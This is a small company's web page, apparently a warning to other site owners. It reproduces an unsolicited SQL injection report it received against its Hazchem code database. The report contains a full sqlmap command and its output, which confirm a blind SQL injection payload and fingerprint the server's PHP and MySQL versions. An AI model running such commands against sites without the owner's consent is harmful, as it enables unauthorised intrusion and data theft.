Computers Ltd

Our details 

Example of hacking

If you store data on a web server then you really need to stay on top of security and confidentiality. There are many people at the moment trying to hack sites to either steal the data or to gain financial reward for 'keeping quiet' on your lack of security. They try to hide this under a banner of 'ethical hacking'.

Here is an example of an act on our web site where we were contacted with information on a security lapse on our Hazchem database. This was done without our authorisation using a product called sqlmap which is commonly available on the internet.

We do not store any personal data on our web site but we have several databases containing non-personal data each with individual access usernames and passwords.

Here is what we got -

Description: this webpage
with this param
is sqli vulnerable
sqlmap poc
:~$ sudo /usr/local/bin/sqlmap --url= --data="formtext1=%27&formbutton1=Find+Code" --random-agent --dbms=mysql --level=5 --risk=3 --technique=B -p formtext1 -f --identify-waf --tamper=between --time-sec=120 --timeout=120 --drop-set-cookie
[sudo] Mot de passe de fakessh :
___ ___[(]_____ ___ ___ {}
|_ -| . [,] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V |_|
[!] legal disclaimer:
Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 15:11:48
[15:11:48] [INFO] loading tamper module 'between'
[15:11:48] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv: Gecko/20060911 Firefox/' from file '/pentest/exploitation/sqlmap/txt/user-agents.txt'
[15:11:49] [WARNING] it appears that you have provided tainted parameter values ('formtext1='') with most likely leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly
are you really sure that you want to continue (sqlmap could have problems)? [y/N] y
[15:11:53] [INFO] testing connection to the target URL
[15:11:54] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
[15:11:54] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[15:11:55] [INFO] using WAF scripts to detect backend WAF/IPS/IDS protection
[15:12:00] [WARNING] WAF/IPS/IDS product hasn't been identified
[15:12:00] [INFO] testing if the target URL content is stable
[15:12:00] [INFO] target URL content is stable
[15:12:01] [WARNING] heuristic (basic) test shows that POST parameter 'formtext1' might not be injectable
[15:12:01] [INFO] testing for SQL injection on POST parameter 'formtext1'
[15:12:02] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:12:02] [WARNING] reflective value(s) found and filtering out
[15:13:03] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[15:13:15] [INFO] POST parameter 'formtext1' appears to be 'OR boolean-based blind - WHERE or HAVING clause' injectable (with --string="OF")
[15:13:15] [INFO] checking if the injection point on POST parameter 'formtext1' is a false positive
POST parameter 'formtext1' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 138 HTTP(s) requests:
Parameter: formtext1 (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: formtext1=-3642 OR 1039=1039&formbutton1=Find Code
[15:16:11] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[15:16:11] [INFO] testing MySQL
[15:16:13] [INFO] confirming MySQL
[15:16:16] [INFO] the back-end DBMS is MySQL
[15:16:16] [INFO] actively fingerprinting MySQL
[15:16:18] [INFO] executing MySQL comment injection fingerprint
web application technology: Apache, PHP 5.5.38
back-end DBMS: active fingerprint: MySQL >= 5.5
[15:17:01] [INFO] fetched data logged to text files under '/root/.sqlmap/output/'
[*] shutting down at 15:17:01

This is a deliberate attempt at 'ethical' hacking but crosses the line. The program evens warns against its use without prior approval of the site owner. There was nothing that was ever going to be taken from our site apart from a list of UNNO codes which are openly available from the United Nations.

Our databases contain non-personal data, like the Hazchem codes and placenames in Ireland.

Yours may contain personal data of which the security is paramount under GDPR. Be warned that there are people about who have little regard for the law and your rights.
Basic Blue theme by ThemeFlood

PLEASE NOTE: We do not actively use cookies - see our Cookie Policy for details. We do not use Google Analytics. We do use the basic GoSquared LiveStats.